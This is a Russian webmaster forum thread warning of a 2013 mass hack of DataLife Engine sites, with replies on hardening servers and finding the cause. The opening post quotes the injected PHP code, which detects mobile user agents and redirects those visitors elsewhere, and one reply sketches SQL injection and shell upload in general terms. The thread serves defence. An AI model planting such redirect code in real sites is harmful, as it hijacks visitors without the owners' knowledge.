Массовый взлом DLE сайтов от 13.01.2013

-=ber$erk=-

-=ber$erk=-

Постоялец
Регистрация
17 Мар 2008
Сообщения
237
Реакции
108
Проверьте у себя и предупредите других!

В настоящий момент имеется массовый взлом DLE сайтов.

изменяются файлы
файлы
index.php
engine/engine.php
engine/init.php
engine/data/config.php
engine/data/dbconfig.php

вставляют код

$iphone = strpos($_SERVER['HTTP_USER_AGENT'],"iPhone");
$android = strpos($_SERVER['HTTP_USER_AGENT'],"Android");
$palmpre = strpos($_SERVER['HTTP_USER_AGENT'],"webOS");
$berry = strpos($_SERVER['HTTP_USER_AGENT'],"BlackBerry");
$ipod = strpos($_SERVER['HTTP_USER_AGENT'],"iPod");

if ($iphone || $android || $palmpre || $ipod || $berry === true) {
header('Location: Для просмотра ссылки Войди или Зарегистрируйся;);

в одном файле может быть несколько раз

про саму уязвимость ничего не известно, но возможно
Для просмотра ссылки Войди или Зарегистрируйся
 
Чтобы было известно надо сомтреть логи. Чтобы не изменяли надо правильно выставлять права на свои файлы и директории.
 
Скрытое содержимое доступно для зарегистрированных пользователей!
 
не, у меня тоже гости побывали, но такая метода не подходит.
 
StrikeOFF написал(а):
Чтобы было известно надо сомтреть логи. Чтобы не изменяли надо правильно выставлять права на свои файлы и директории.
Нажмите для раскрытия...
так вроде не первый год "замужем"
права на запись правильные, только от владельца
пароль только в голове
хз каким образом "погостили"
а логи читать на шт 50 сайтов на 4 серверах никакой жизни не хватит
 
админка закрыта .htaccess ?
 
Или может через расширение взломали?
Скрытое содержимое доступно для зарегистрированных пользователей!
 
-=ber$erk=- написал(а):
массовый взлом...
Нажмите для раскрытия...
все эти иньекцие которые помогают получить доступ к админке фигня, если использовать мой Для просмотра ссылки Войди или Зарегистрируйся
это как минимум даст вам время, чтобы залатать дырку и предотвратить остальные недочёты.
не говоря уже о самом простом, (если вы на VDS) а это удалить нафиг phpmyadmin, закрыть все ненужные порты, и открыть порты только для своего IP адресса MySQL, SSH, и прочие. И каждый день заходить и прописывать yum update
 
fumofuuu написал(а):
все эти иньекцие которые помогают получить доступ к админке фигня, если использовать мой Для просмотра ссылки Войди или Зарегистрируйся
это как минимум даст вам время, чтобы залатать дырку и предотвратить остальные недочёты.
не говоря уже о самом простом, (если вы на VDS) а это удалить нафиг phpmyadmin, закрыть все ненужные порты, и открыть порты только для своего IP адресса MySQL, SSH, и прочие. И каждый день заходить и прописывать yum update
Нажмите для раскрытия...
И нужно всего лишь загрузить через дырку PHP-шелл чтобы обойти твой мего-пупер-супер хак... Не говори ерунды, твой хак поможет разве что защитить от входа в админку сайта, а от SQL-инъекций он никак не защищает. Зачем нам получать вообще доступ в админку, если мы через ту же инъекцию можем слить полностью базу? А вторая дырка позволит нам залить шелл и делать всё что угодно с сайтом. Админка тут ни при чём. Читай матчасть по уязвимостям.
 
ТС Скажи взломы произошли до патча или после ?
 
Войдите или зарегистрируйтесь для ответа.
Назад
Сверху